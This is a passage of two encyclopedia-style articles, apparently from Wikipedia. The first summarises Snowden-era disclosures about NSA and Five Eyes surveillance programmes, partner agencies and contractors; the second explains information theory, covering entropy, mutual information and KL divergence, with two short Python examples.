Skype, YouTube, and Apple Inc.[41][42] Contact chaining is a method that involves utilizing data related to social links among individuals, including call logs that connect phone numbers with each other, in order to pinpoint individuals associated with criminal groups.
However, a lack of privacy guidelines can result in this process amassing an extensive portion of user data.[45]

The NSA uses the analysis of the phone call and e-mail logs of American citizens to create sophisticated graphs of their social connections that can identify their associates, their locations at certain times, their traveling companions and other personal information.[44]

According to top secret NSA documents leaked by Snowden, during a single day in 2012 the NSA collected e-mail address books from several major webmail and social-networking services. Each day, the NSA collects contacts from an estimated 500,000 buddy lists on live-chat services as well as from the inbox displays of Web-based e-mail accounts.[46] Taken together, the data enables the NSA to draw detailed maps of a person's life based on their personal, professional, religious and political connections.[46]

Federal agencies in the United States: Data gathered by these surveillance programs is routinely shared with the U.S. Federal Bureau of Investigation (FBI) and the U.S. Central Intelligence Agency (CIA).[47] In addition, the NSA supplies domestic intercepts to the Drug Enforcement Administration (DEA), Internal Revenue Service (IRS), and other law enforcement agencies.[33]

Foreign countries: As a result of the NSA's secret treaties with foreign countries, data gathered by its surveillance programs is routinely shared with countries who are signatories to the UKUSA Agreement. These foreign countries also help to operate several NSA programs such as XKEYSCORE. (See International cooperation.)

A special branch of the NSA called "Follow the Money" (FTM) monitors international payments, banking and credit card transactions and later stores the collected data in the NSA's financial databank, "Tracfin".[48]

Mobile phone tracking refers to the act of attaining the position and coordinates of a mobile phone. According to The Washington Post, the NSA has been tracking the locations of mobile phones all over the world by tapping into the cables that connect mobile networks globally and that serve U.S. cellphones as well as foreign ones. In the process of doing so, the NSA collects more than 5 billion records of phone locations on a daily basis. This enables NSA analysts to map cellphone owners' relationships by correlating their patterns of movement over time with those of the thousands or millions of other phone users who cross their paths.[49][50][51][52][53][54][55]

In order to decode private conversations, the NSA has cracked the most commonly used cellphone encryption technology, A5/1. According to a classified document leaked by Snowden, the agency can "process encrypted A5/1" even when it has not acquired an encryption key.[56] In addition, the NSA uses various types of cellphone infrastructure, such as the links between carrier networks, to determine the location of a cellphone user tracked by Visitor Location Registers.[57]

As worldwide sales of smartphones grew rapidly, the NSA decided to take advantage of the smartphone boom.
This is particularly advantageous because the smartphone contains a variety of data sets that would interest an intelligence agency, such as social contacts, user behaviour, interests, location, photos, and credit card numbers and passwords.[58]

According to the documents leaked by Snowden, the NSA has set up task forces assigned to several smartphone manufacturers and operating systems, including Apple Inc.'s iPhone and iOS operating system, as well as Google's Android mobile operating system.[58] Similarly, Britain's GCHQ assigned a team to study and crack the BlackBerry.[58] In addition, there are smaller NSA programs, known as "scripts", that can perform surveillance on 38 different features of the iOS 3 and iOS 4 operating systems. These include the mapping feature, voicemail and photos, as well as Google Earth, Facebook and Yahoo! Messenger.[58]

In contrast to the PRISM surveillance program, which is a front-door method of access that is nominally approved by the FISA court, the MUSCULAR surveillance program is noted to be "unusually aggressive" in its usage of unorthodox hacking methods to infiltrate Yahoo! and Google data centres around the world. As the program is operated overseas (in the United Kingdom), the NSA presumes that anyone using a foreign data link is a foreigner and is therefore able to collect content and metadata on a previously unknown scale from U.S. citizens and residents.[59] According to the documents leaked by Snowden, the MUSCULAR surveillance program is jointly operated by the NSA and Britain's GCHQ agency.[60] (See International cooperation.)

The Five Eyes have made repeated attempts to spy on Internet users communicating in secret via the anonymity network Tor. Several of their clandestine operations involve the implantation of malicious code into the computers of anonymous Tor users who visit infected websites. In some cases, the NSA and GCHQ have succeeded in blocking access to the anonymous network, diverting Tor users to insecure channels. In other cases, the NSA and the GCHQ were able to uncover the identity of these anonymous users.[61][62][63][64][65][66][67][68][69]

Under the Royal Concierge surveillance program, Britain's GCHQ agency uses an automated monitoring system to infiltrate the reservation systems of at least 350 luxury hotels in many different parts of the world.[70] Other related surveillance programs involve the wiretapping of room telephones and fax machines used in targeted hotels, as well as the monitoring of computers connected to hotel networks.[70]

The U.S. National Security Agency (NSA), the U.S. Central Intelligence Agency (CIA), and Britain's Government Communications Headquarters (GCHQ) have been conducting surveillance on the networks of many online games, including massively multiplayer online role-playing games (MMORPGs) such as World of Warcraft, as well as virtual worlds such as Second Life, and the Xbox gaming console.[71]

According to the April 2013 summary of disclosures, the NSA defined its "intelligence priorities" on a scale of "1" (highest interest) to "5" (lowest interest),[26] and it classified about 30 countries as "3rd parties", with which it cooperates while also spying on them. Other prominent targets included members and adherents of the Internet group known as "Anonymous",[26] as well as potential whistleblowers.[73] According to Snowden, the NSA also targeted reporters who wrote critically about the government after 9/11.[74]

As part of a joint operation with the Central Intelligence Agency (CIA), the NSA deployed secret eavesdropping posts in eighty U.S.
embassies and consulates worldwide.[75] The headquarters of NATO were also used by NSA experts to spy on the European Union.[76]

In 2013, documents provided by Edward Snowden revealed that numerous intergovernmental organizations, diplomatic missions, and government ministries had been subjected to surveillance by the "Five Eyes".

During World War II, the BRUSA Agreement was signed by the governments of the United States and the United Kingdom for the purpose of intelligence sharing.[85] This was later formalized in the UKUSA Agreement of 1946 as a secret treaty. The full text of the agreement was released to the public on 25 June 2010.[86]

Although the treaty was later revised to include other countries such as Denmark, Germany, Ireland, Norway, Turkey, and the Philippines,[86] most of the information sharing has been performed by the so-called "Five Eyes",[87] a term referring to five English-speaking western democracies and their respective intelligence agencies.

SEA-ME-WE 3, which runs across the Afro-Eurasian supercontinent from Japan to Northern Germany, is one of the most important submarine cables accessed by the "Five Eyes". Singapore, a former British colony in the Asia-Pacific region, plays a vital role in intercepting Internet and telecommunications traffic heading from Australia/Japan to Europe, and vice versa. An intelligence-sharing agreement between Singapore and Australia allows the rest of the "Five Eyes" to gain access to SEA-ME-WE 3.[88] TAT-14, a telecommunications cable linking Europe with the United States, was identified as one of the few assets of "Critical Infrastructure and Key Resources" of the US on foreign territory. In 2013, it was revealed that British officials had "pressured a handful of telecommunications and Internet companies" to allow the British government to gain access to TAT-14.[89]

According to the leaked documents, aside from the Five Eyes, most other Western countries have also participated in the NSA surveillance system and are sharing information with each other.[90] In the documents, the NSA lists "approved SIGINT partners", which are partner countries in addition to the Five Eyes. Glenn Greenwald said that the "NSA often maintains these partnerships by paying its partner to develop certain technologies and engage in surveillance, and can thus direct how the spying is carried out." These partner countries are divided into two groups, "Second Parties" and "Third Parties": the Second Parties engage in comprehensive cooperation with the NSA, while the Third Parties engage in focused cooperation.[91][92] However, being a partner of the NSA does not automatically exempt a country from being targeted by the NSA itself. According to an internal NSA document leaked by Snowden, "We (the NSA) can, and often do, target the signals of most 3rd party foreign partners."[93]

The Australian Signals Directorate (ASD), formerly known as the Defence Signals Directorate (DSD), shares information on Australian citizens with the other members of the UKUSA Agreement.
According to a 2008 Five Eyes document leaked by Snowden, the data on Australian citizens shared with foreign countries includes "bulk, unselected, unminimised metadata" as well as "medical, legal or religious information".[96]

In close cooperation with other members of the Five Eyes community, the ASD runs secret surveillance facilities in many parts of Southeast Asia without the knowledge of Australian diplomats.[97] In addition, the ASD cooperates with the Security and Intelligence Division (SID) of the Republic of Singapore in an international operation to intercept underwater telecommunications cables across the Eastern Hemisphere and the Pacific Ocean.[98]

In March 2017, it was reported that, on advice from the Five Eyes intelligence alliance, more than 500 Iraqi and Syrian refugees had been refused entry to Australia in the previous year.[99]

The Communications Security Establishment Canada (CSEC) offers the NSA resources for advanced collection, processing, and analysis, and has set up covert sites at the request of the NSA.[100] The US–Canada SIGINT relationship dates back to a secret alliance formed during World War II, and was formalized in 1949 under the CANUSA Agreement.[100]

On behalf of the NSA, the CSEC opened secret surveillance facilities in 20 countries around the world.[101]

Following the global surveillance disclosures, the CSEC was also revealed to be conducting surveillance on the Wi-Fi hotspots of major Canadian airports, collecting metadata in order to track travelers even days after their departure from those airports.[102]

The Politiets Efterretningstjeneste (PET) of Denmark, a domestic intelligence agency, exchanges data with the NSA on a regular basis, as part of a secret agreement with the United States.[103] Being one of the "9-Eyes" of the UKUSA Agreement, Denmark's relationship with the NSA is closer than the NSA's relationship with Germany, Sweden, Spain, Belgium or Italy.[104]

The Directorate-General for External Security (DGSE) of France maintains a close relationship with both the NSA and the GCHQ, after discussions for increased cooperation began in November 2006.[105] By the early 2010s, the extent of cooperation in the joint interception of digital data by the DGSE and the NSA had increased dramatically.[105][106]

In 2011, a formal memorandum for data exchange was signed by the DGSE and the NSA, which facilitated the transfer of millions of metadata records from the DGSE to the NSA.[107] From December 2012 to 8 January 2013, over 70 million metadata records were handed over to the NSA by French intelligence agencies.[107]

The Bundesnachrichtendienst (BND) of Germany systematically transfers metadata from German intelligence sources to the NSA. In December 2012 alone, the BND provided the NSA with 500 million metadata records.[108] The NSA granted the Bundesnachrichtendienst access to X-Keyscore,[109] in exchange for the German surveillance programs Mira4 and Veras.[108]

In early 2013, Hans-Georg Maaßen, President of the German domestic security agency Bundesamt für Verfassungsschutz (BfV), made several visits to the headquarters of the NSA. According to classified documents of the German government, Maaßen agreed to transfer all data records of persons monitored in Germany by the BfV via XKeyscore to the NSA.[110] In addition, the BfV works very closely with eight other U.S.
government agencies, including the CIA.[111] Under Project 6, which is jointly operated by the CIA, BfV, and BND, a massive database containing personal information such as photos, license plate numbers, Internet search histories and telephone metadata was developed to gain a better understanding of the social relationships of presumed jihadists.[112]

In 2012, the BfV handed over 864 data sets of personal information to the CIA, NSA and seven other U.S. intelligence agencies. In exchange, the BND received data from U.S. intelligence agencies on 1,830 occasions. The newly acquired data was handed over to the BfV and stored in a domestically accessible system known as NADIS WN.[113]

The Israeli SIGINT National Unit (ISNU) routinely receives raw, unfiltered data on U.S. citizens from the NSA. However, a secret NSA document leaked by Snowden revealed that U.S. government officials are explicitly exempted from such forms of data sharing with the ISNU.[116] As stated in a memorandum detailing the rules of data sharing on U.S. citizens, the ISNU is obligated to:

Destroy upon recognition any communication contained in raw SIGINT provided by NSA that is either to or from an official of the U.S. government. "U.S. government officials" include officials of the Executive Branch (including White House, Cabinet Departments, and independent agencies); the U.S. House of Representatives and Senate (members and staff); and the U.S. Federal Court system (including, but not limited to, the Supreme Court).

According to the undated memorandum, the ground rules for intelligence sharing between the NSA and the ISNU were laid out in March 2009.[116] Under the data sharing agreement, the ISNU is allowed to retain the identities of U.S. citizens (excluding U.S. government officials) for up to a year.[116]

In 2011, the NSA asked the Japanese government to intercept underwater fibre-optic cables carrying phone and Internet data in the Asia-Pacific region. However, the Japanese government refused to comply.[117]

Under the rule of Muammar Gaddafi, the Libyan regime forged a partnership with Britain's secret service MI6 and the U.S. Central Intelligence Agency (CIA) to obtain information about Libyan dissidents living in the United States and Canada. In exchange, Gaddafi allowed the Western democracies to use Libya as a base for extraordinary renditions.[118][119][120][121][122]

The Algemene Inlichtingen- en Veiligheidsdienst (AIVD) of the Netherlands has been receiving and storing data of Internet users gathered by U.S. intelligence sources such as the NSA's PRISM surveillance program.[123] During a meeting in February 2013, the AIVD and the MIVD briefed the NSA on their attempts to hack Internet forums and to collect the data of all users using a technology known as Computer Network Exploitation (CNE).[124]

The Norwegian Intelligence Service (NIS) has confirmed that data collected by the agency is "shared with the Americans".[125] Kjell Grandhagen, head of Norwegian military intelligence, told reporters at a news conference that "We share this information with partners, and partners share with us ... We are talking about huge amounts of traffic data".[126]

In cooperation with the NSA, the NIS has gained access to Russian targets in the Kola Peninsula and other civilian targets.
In general, the NIS provides information to the NSA about "Politicians", "Energy" and "Armament".[127] A top secret NSA memo lists several years as milestones of the Norway–United States of America SIGINT agreement, or NORUS Agreement.

The NSA perceives the NIS as one of its most reliable partners. Both agencies also cooperate to crack the encryption systems of mutual targets. According to the NSA, Norway has made no objections to its requests.[128]

The Defence Ministry of Singapore and its Security and Intelligence Division (SID) have been secretly intercepting much of the fibre-optic cable traffic passing through the Asian continent. In close cooperation with the Australian Signals Directorate (ASD/DSD), Singapore's SID has been able to intercept the SEA-ME-WE 3 (Southeast Asia–Middle East–Western Europe 3) as well as SEA-ME-WE 4 telecommunications cables.[98] Access to these international telecommunications channels is facilitated by Singapore's government-owned operator, SingTel.[98] Temasek Holdings, a multibillion-dollar sovereign wealth fund with a majority stake in SingTel, has maintained close relations with the country's intelligence agencies.[98]

Information gathered by the Government of Singapore is transferred to the Government of Australia as part of an intelligence-sharing agreement. This allows the "Five Eyes" to maintain a "stranglehold on communications across the Eastern Hemisphere".[88]

In close cooperation with the Centro Nacional de Inteligencia (CNI), the NSA intercepted 60.5 million phone calls in Spain in a single month.[129][130]

The Försvarets radioanstalt (FRA) of Sweden (codenamed Sardines)[131] has allowed the "Five Eyes" to access underwater cables in the Baltic Sea.[131] On 5 December 2013, Sveriges Television (Swedish Television) revealed that the FRA had been conducting a clandestine surveillance operation targeting the internal politics of Russia. The operation was conducted on behalf of the NSA, which receives data handed over to it by the FRA.[132][133]

According to documents leaked by Snowden, the FRA of Sweden has been granted access to the NSA's international surveillance program XKeyscore.[134]

The Federal Intelligence Service (NDB) of Switzerland exchanges information with the NSA regularly, on the basis of a secret agreement to circumvent domestic surveillance restrictions.[135][136] In addition, the NSA has been granted access to Swiss surveillance facilities in Leuk (canton of Valais) and Herrenschwanden (canton of Bern), which are part of the Swiss surveillance program Onyx.[135]

According to the NDB, the agency maintains working relationships with about 100 international organizations. However, the NDB has denied any form of cooperation with the NSA.[137] Although the NSA does not have direct access to Switzerland's Onyx surveillance program, the Director of the NDB acknowledged that it is possible for other U.S. intelligence agencies to gain access to Switzerland's surveillance system.[137]

The British government allowed the NSA to store the personal data of British citizens.[138]

Under Project MINARET, anti-Vietnam War dissidents in the United States were jointly targeted by the GCHQ and the NSA.[139][140]

The NSA's Foreign Affairs Directorate interacts with foreign intelligence services and members of the Five Eyes to implement global surveillance.[143]

The FBI acts as the liaison between U.S.
intelligence agencies and Silicon Valley giants such as Microsoft.[47]

In the early 2010s, the DHS conducted a joint surveillance operation with the FBI to crack down on dissidents of the Occupy Wall Street protest movement.[144][145][146]

The NSA supplies domestic intercepts to the Drug Enforcement Administration (DEA), Internal Revenue Service (IRS), and other law enforcement agencies, who use the intercepted data to initiate criminal investigations against US citizens. Federal agents are instructed to "recreate" the investigative trail in order to "cover up" where the information originated.[33]

Weeks after the September 11 attacks, U.S. President George W. Bush signed the Patriot Act to ensure no disruption in the government's ability to conduct global surveillance:

This new law that I sign today will allow surveillance of all communications used by terrorists, including e-mails, the Internet and cell phones.

The Patriot Act was renewed by U.S. President Barack Obama in May 2011, further extending the federal government's legal authority to conduct additional forms of surveillance such as roving wiretaps.[148]

Over 70 percent of the United States Intelligence Community's budget is earmarked for payment to private firms.[149] According to Forbes magazine, the defense technology company Lockheed Martin is currently the US's biggest defense contractor, and it is destined to be the NSA's most powerful commercial partner and biggest contractor in terms of dollar revenue.[150]

In a joint operation with the NSA, the American telecommunications corporation AT&T operates Room 641A in the SBC Communications building in San Francisco to spy on Internet traffic.[151] The CIA pays AT&T more than US$10 million a year to gain access to international phone records, including those of U.S. citizens.[142]

Projects developed by Booz Allen Hamilton include the Strategic Innovation Group, which identifies terrorists through social media on behalf of government agencies.[152] During the fiscal year 2013, Booz Allen Hamilton derived 99% of its income from the government, with the largest portion of its revenue coming from the U.S. Army.[152] In 2013, Booz Allen Hamilton was hailed by Bloomberg Businessweek as "the World's Most Profitable Spy Organization".[153]

British Telecommunications (code-named Remedy[154]), a major supplier of telecommunications, granted Britain's intelligence agency GCHQ "unlimited access" to its network of undersea cables, according to documents leaked by Snowden.[154]

The American multinational corporation Microsoft helped the NSA to circumvent software encryption safeguards. It also allowed the federal government to monitor web chats on the Outlook.com portal.[47] In 2013, Microsoft worked with the FBI to allow the NSA to gain access to the company's cloud storage service SkyDrive.[47]

The French telecommunications corporation Orange S.A. shares customer call data with the French intelligence agency DGSE, and the intercepted data is handed over to GCHQ.[155]

RSA Security was paid US$10 million by the NSA to introduce a cryptographic backdoor in its encryption products.[156]

Strategic Forecasting, Inc., more commonly known as Stratfor, is a global intelligence company offering information to governments and private clients including Dow Chemical Company, Lockheed Martin, Northrop Grumman, Raytheon, the U.S. Department of Homeland Security, the U.S. Defense Intelligence Agency, and the U.S.
Marine Corps.[157]

The British telecommunications company Vodafone (code-named Gerontic[154]) granted Britain's intelligence agency GCHQ "unlimited access" to its network of undersea cables, according to documents leaked by Snowden.[154]

In-Q-Tel, which receives more than US$56 million a year in government support,[158] is a venture capital firm that enables the CIA to invest in Silicon Valley.[158]

Palantir Technologies is a data mining corporation with close ties to the FBI, NSA and CIA.[159][160] Based in Palo Alto, California, the company developed a data collection and analytical program known as Prism.[161][162] In 2011, it was revealed that the company had conducted surveillance on Glenn Greenwald.[163][164]

Several countries have evaded global surveillance by constructing secret bunker facilities deep below the Earth's surface.[165]

Despite North Korea being a priority target, the NSA's internal documents acknowledged that it did not know much about Kim Jong-un and his regime's intentions.[72]

In October 2012, Iran's police chief Esmail Ahmadi Moghaddam alleged that Google is not a search engine but "a spying tool" for Western intelligence agencies.[166] Six months later, in April 2013, the country announced plans to introduce an "Islamic Google Earth" to evade global surveillance.[167]

Libya evaded surveillance by building "hardened and buried" bunkers at least 40 feet below ground level.[165]

The global surveillance disclosure has caused tension in the bilateral relations of the United States with several of its allies and economic partners, as well as in its relationship with the European Union. On 12 August 2013, President Obama announced the creation of an "independent" panel of "outside experts" to review the NSA's surveillance programs. The panel is to be established by the Director of National Intelligence, James R. Clapper, who will consult with and provide assistance to it.[168]

According to a survey undertaken by the human rights group PEN International, these disclosures have had a chilling effect on American writers. Fearing the risk of being targeted by government surveillance, 28% of PEN's American members have curbed their usage of social media, and 16% have self-censored by avoiding controversial topics in their writings.[169]
https://en.wikipedia.org/wiki/Global_surveillance
Information theory is the mathematical study of the quantification, storage, and communication of information. The field was established and formalized by Claude Shannon in the 1940s,[1] though early contributions were made in the 1920s through the works of Harry Nyquist and Ralph Hartley. It is at the intersection of electronic engineering, mathematics, statistics, computer science, neurobiology, physics, and electrical engineering.[2][3]

A key measure in information theory is entropy. Entropy quantifies the amount of uncertainty involved in the value of a random variable or the outcome of a random process. For example, identifying the outcome of a fair coin flip (which has two equally likely outcomes) provides less information (lower entropy, less uncertainty) than identifying the outcome from a roll of a die (which has six equally likely outcomes). Some other important measures in information theory are mutual information, channel capacity, error exponents, and relative entropy. Important sub-fields of information theory include source coding, algorithmic complexity theory, algorithmic information theory and information-theoretic security.

Applications of fundamental topics of information theory include source coding/data compression (e.g. for ZIP files), and channel coding/error detection and correction (e.g. for DSL). Its impact has been crucial to the success of the Voyager missions to deep space,[4] the invention of the compact disc, the feasibility of mobile phones and the development of the Internet and artificial intelligence.[5][6][3] The theory has also found applications in other areas, including statistical inference,[7] cryptography, neurobiology,[8] perception,[9] signal processing,[2] linguistics, the evolution[10] and function[11] of molecular codes (bioinformatics), thermal physics,[12] molecular dynamics,[13] black holes, quantum computing, information retrieval, intelligence gathering, plagiarism detection,[14] pattern recognition, anomaly detection,[15] the analysis of music,[16][17] art creation,[18] imaging system design,[19] the study of outer space,[20] the dimensionality of space,[21] and epistemology.[22]

Information theory studies the transmission, processing, extraction, and utilization of information. Abstractly, information can be thought of as the resolution of uncertainty. In the case of communication of information over a noisy channel, this abstract concept was formalized in 1948 by Claude Shannon in a paper entitled A Mathematical Theory of Communication, in which information is thought of as a set of possible messages, and the goal is to send these messages over a noisy channel, and to have the receiver reconstruct the message with low probability of error, in spite of the channel noise. Shannon's main result, the noisy-channel coding theorem, showed that, in the limit of many channel uses, the rate of information that is asymptotically achievable is equal to the channel capacity, a quantity dependent merely on the statistics of the channel over which the messages are sent.[8]

Coding theory is concerned with finding explicit methods, called codes, for increasing the efficiency and reducing the error rate of data communication over noisy channels to near the channel capacity. These codes can be roughly subdivided into data compression (source coding) and error-correction (channel coding) techniques. In the latter case, it took many years to find the methods Shannon's work proved were possible.[23][24]

A third class of information theory codes are cryptographic algorithms (both codes and ciphers).
Concepts, methods and results from coding theory and information theory are widely used in cryptography and cryptanalysis,[25] such as the unit ban.

The landmark event establishing the discipline of information theory and bringing it to immediate worldwide attention was the publication of Claude E. Shannon's classic paper "A Mathematical Theory of Communication" in the Bell System Technical Journal in July and October 1948. Historian James Gleick rated the paper as the most important development of 1948, noting that the paper was "even more profound and more fundamental" than the transistor.[26] Shannon came to be known as the "father of information theory".[27][28][29] He had outlined some of his initial ideas of information theory as early as 1939 in a letter to Vannevar Bush.[29]

Prior to this paper, limited information-theoretic ideas had been developed at Bell Labs, all implicitly assuming events of equal probability. Harry Nyquist's 1924 paper, Certain Factors Affecting Telegraph Speed, contains a theoretical section quantifying "intelligence" and the "line speed" at which it can be transmitted by a communication system, giving the relation W = K log m (recalling the Boltzmann constant), where W is the speed of transmission of intelligence, m is the number of different voltage levels to choose from at each time step, and K is a constant. Ralph Hartley's 1928 paper, Transmission of Information, uses the word information as a measurable quantity, reflecting the receiver's ability to distinguish one sequence of symbols from any other, thus quantifying information as H = log S^n = n log S, where S is the number of possible symbols, and n the number of symbols in a transmission. The unit of information was therefore the decimal digit, which has since sometimes been called the hartley in his honor as a unit, scale, or measure of information. Alan Turing in 1940 used similar ideas as part of the statistical analysis of the breaking of the German Second World War Enigma ciphers.[citation needed]

Much of the mathematics behind information theory with events of different probabilities was developed for the field of thermodynamics by Ludwig Boltzmann and J. Willard Gibbs. Connections between information-theoretic entropy and thermodynamic entropy, including the important contributions by Rolf Landauer in the 1960s, are explored in Entropy in thermodynamics and information theory.[citation needed]

In Shannon's revolutionary and groundbreaking paper, the work for which had been substantially completed at Bell Labs by the end of 1944, Shannon for the first time introduced the qualitative and quantitative model of communication as a statistical process underlying information theory, opening with the assertion that "The fundamental problem of communication is that of reproducing at one point, either exactly or approximately, a message selected at another point."

With it came the ideas of the information entropy and redundancy of a source, the channel capacity of a noisy channel, and the bit as a unit of information.

Information theory is based on probability theory and statistics, where quantified information is usually described in terms of bits. Information theory often concerns itself with measures of information of the distributions associated with random variables. One of the most important measures is called entropy, which forms the building block of many other measures. Entropy allows quantification of the amount of information in a single random variable.[30] Another useful concept is mutual information, defined on two random variables, which describes the measure of information in common between those variables and can be used to describe their correlation. The former quantity is a property of the probability distribution of a random variable and gives a limit on the rate at which data generated by independent samples with the given distribution can be reliably compressed. The latter is a property of the joint distribution of two random variables, and is the maximum rate of reliable communication across a noisy channel in the limit of long block lengths, when the channel statistics are determined by the joint distribution.
The choice of logarithmic base in the following formulae determines the unit of information entropy that is used. A common unit of information is the bit or shannon, based on the binary logarithm. Other units include the nat, which is based on the natural logarithm, and the decimal digit, which is based on the common logarithm.

In what follows, an expression of the form p log p is considered by convention to be equal to zero whenever p = 0. This is justified because lim_{p→0+} p log p = 0 for any logarithmic base.

Based on the probability mass function of each source symbol to be communicated, the Shannon entropy H, in units of bits (per symbol), is given by

H = − Σ_i p_i log2(p_i),

where p_i is the probability of occurrence of the i-th possible value of the source symbol. This equation gives the entropy in units of "bits" (per symbol) because it uses a logarithm of base 2, and this base-2 measure of entropy has sometimes been called the shannon in his honor. Entropy is also commonly computed using the natural logarithm (base e, where e is Euler's number), which produces a measurement of entropy in nats per symbol and sometimes simplifies the analysis by avoiding the need to include extra constants in the formulas. Other bases are also possible, but less commonly used. For example, a logarithm of base 2^8 = 256 will produce a measurement in bytes per symbol, and a logarithm of base 10 will produce a measurement in decimal digits (or hartleys) per symbol.

Intuitively, the entropy H(X) of a discrete random variable X is a measure of the amount of uncertainty associated with the value of X when only its distribution is known. The entropy of a source that emits a sequence of N symbols that are independent and identically distributed (iid) is N·H bits (per message of N symbols). If the source data symbols are identically distributed but not independent, the entropy of a message of length N will be less than N·H.

If one transmits 1000 bits (0s and 1s), and the value of each of these bits is known to the receiver (has a specific value with certainty) ahead of transmission, it is clear that no information is transmitted. If, however, each bit is independently equally likely to be 0 or 1, 1000 shannons of information (more often called bits) have been transmitted. Between these two extremes, information can be quantified as follows. If 𝕏 is the set of all messages {x1, ..., xn} that X could be, and p(x) is the probability of some x ∈ 𝕏, then the entropy, H, of X is defined:[31]

H(X) = E_X[I(x)] = − Σ_{x∈𝕏} p(x) log p(x).

(Here, I(x) is the self-information, which is the entropy contribution of an individual message, and E_X is the expected value.) A property of entropy is that it is maximized when all the messages in the message space are equiprobable, p(x) = 1/n; i.e., most unpredictable, in which case H(X) = log n.
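The coin and die comparison from the introduction can be reproduced numerically. Below is a minimal sketch of the formula H = −Σ p log2 p; the function name and example distributions are illustrative, not from the article.

```python
from math import log2

def shannon_entropy(probabilities):
    """Shannon entropy in bits: H = -sum(p * log2(p)), with 0*log(0) taken as 0."""
    return -sum(p * log2(p) for p in probabilities if p > 0)

fair_coin = [0.5, 0.5]
fair_die = [1/6] * 6
biased_coin = [0.9, 0.1]

print(shannon_entropy(fair_coin))    # 1.0 bit
print(shannon_entropy(fair_die))     # ~2.585 bits (log2 of 6)
print(shannon_entropy(biased_coin))  # ~0.469 bits: less uncertain than a fair coin
```

The die's outcome carries more information than the coin's, and the biased coin less than the fair one, matching the maximization property stated above.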
The special case of information entropy for a random variable with two outcomes is the binary entropy function, usually taken to logarithmic base 2, thus having the shannon (Sh) as unit:

H_b(p) = − p log2 p − (1 − p) log2(1 − p).

The joint entropy of two discrete random variables X and Y is merely the entropy of their pairing: (X, Y). This implies that if X and Y are independent, then their joint entropy is the sum of their individual entropies. For example, if (X, Y) represents the position of a chess piece, with X the row and Y the column, then the joint entropy of the row of the piece and the column of the piece will be the entropy of the position of the piece. Despite similar notation, joint entropy should not be confused with cross-entropy.

The conditional entropy or conditional uncertainty of X given random variable Y (also called the equivocation of X about Y) is the average conditional entropy over Y:[32]

H(X|Y) = E_Y[H(X|y)] = − Σ_{x,y} p(x, y) log p(x|y).

Because entropy can be conditioned on a random variable or on that random variable being a certain value, care should be taken not to confuse these two definitions of conditional entropy, the former of which is in more common use. A basic property of this form of conditional entropy is that:

H(X|Y) = H(X, Y) − H(Y).

Mutual information measures the amount of information that can be obtained about one random variable by observing another. It is important in communication, where it can be used to maximize the amount of information shared between sent and received signals. The mutual information of X relative to Y is given by:

I(X; Y) = E_{X,Y}[SI(x, y)] = Σ_{x,y} p(x, y) log [ p(x, y) / (p(x) p(y)) ],

where SI (specific mutual information) is the pointwise mutual information. A basic property of the mutual information is that

I(X; Y) = H(X) − H(X|Y).

That is, knowing Y, we can save an average of I(X; Y) bits in encoding X compared to not knowing Y. Mutual information is symmetric:

I(X; Y) = I(Y; X) = H(X) + H(Y) − H(X, Y).

Mutual information can be expressed as the average Kullback–Leibler divergence (information gain) between the posterior probability distribution of X given the value of Y and the prior distribution on X:

I(X; Y) = E_Y[ D_KL( p(X|Y=y) ‖ p(X) ) ].

In other words, this is a measure of how much, on the average, the probability distribution on X will change if we are given the value of Y. This is often recalculated as the divergence from the product of the marginal distributions to the actual joint distribution:

I(X; Y) = D_KL( p(X, Y) ‖ p(X) p(Y) ).

Mutual information is closely related to the log-likelihood ratio test in the context of contingency tables and the multinomial distribution and to Pearson's χ² test: mutual information can be considered a statistic for assessing independence between a pair of variables, and has a well-specified asymptotic distribution.

The Kullback–Leibler divergence (or information divergence, information gain, or relative entropy) is a way of comparing two distributions: a "true" probability distribution p(X), and an arbitrary probability distribution q(X). If we compress data in a manner that assumes q(X) is the distribution underlying some data when, in reality, p(X) is the correct distribution, the Kullback–Leibler divergence is the average number of additional bits per datum necessary for compression. It is thus defined

D_KL( p(X) ‖ q(X) ) = Σ_{x∈X} p(x) log [ p(x) / q(x) ].

Although it is sometimes used as a 'distance metric', KL divergence is not a true metric since it is not symmetric and does not satisfy the triangle inequality (making it a semi-quasimetric). Another interpretation of the KL divergence is the "unnecessary surprise" introduced by a prior from the truth: suppose a number X is about to be drawn randomly from a discrete set with probability distribution p(x). If Alice knows the true distribution p(x), while Bob believes (has a prior) that the distribution is q(x), then Bob will be more surprised than Alice, on average, upon seeing the value of X. The KL divergence is the (objective) expected value of Bob's (subjective) surprisal minus Alice's surprisal, measured in bits if the log is in base 2. In this way, the extent to which Bob's prior is "wrong" can be quantified in terms of how "unnecessarily surprised" it is expected to make him.
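As a concrete illustration of the identity I(X; Y) = D_KL(p(X, Y) ‖ p(X)p(Y)), the following sketch computes the KL divergence and then obtains the mutual information of a small joint distribution as the divergence from the product of its marginals. The 2×2 table is an arbitrary made-up example.

```python
from math import log2

def kl_divergence(p, q):
    """D_KL(p || q) in bits; assumes q(x) > 0 wherever p(x) > 0."""
    return sum(px * log2(px / qx) for px, qx in zip(p, q) if px > 0)

# Joint distribution p(x, y) of two binary variables, as a 2x2 table.
joint = [[0.4, 0.1],
         [0.1, 0.4]]
px = [sum(row) for row in joint]        # marginal of X: [0.5, 0.5]
py = [sum(col) for col in zip(*joint)]  # marginal of Y: [0.5, 0.5]

# Mutual information as the KL divergence from the product of marginals
# to the joint distribution: I(X;Y) = D_KL(p(x,y) || p(x)p(y)).
flat_joint = [joint[i][j] for i in range(2) for j in range(2)]
flat_product = [px[i] * py[j] for i in range(2) for j in range(2)]
print(kl_divergence(flat_joint, flat_product))  # ~0.278 bits
```

A result of zero would indicate independence; the ~0.278 bits here reflect the correlation built into the joint table.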
Directed information, I(X^n → Y^n), is an information-theoretic measure that quantifies the information flow from the random process X^n = {X1, X2, ..., Xn} to the random process Y^n = {Y1, Y2, ..., Yn}. The term directed information was coined by James Massey and is defined as

I(X^n → Y^n) = Σ_{i=1}^{n} I(X^i; Y_i | Y^{i−1}),

where I(X^i; Y_i | Y^{i−1}) is the conditional mutual information I(X1, X2, ..., X_i; Y_i | Y1, Y2, ..., Y_{i−1}).

In contrast to mutual information, directed information is not symmetric. I(X^n → Y^n) measures the information bits that are transmitted causally[clarification needed] from X^n to Y^n. Directed information has many applications in problems where causality plays an important role, such as the capacity of channels with feedback,[33][34] the capacity of discrete memoryless networks with feedback,[35] gambling with causal side information,[36] compression with causal side information,[37] real-time control communication settings,[38][39] and statistical physics.[40]

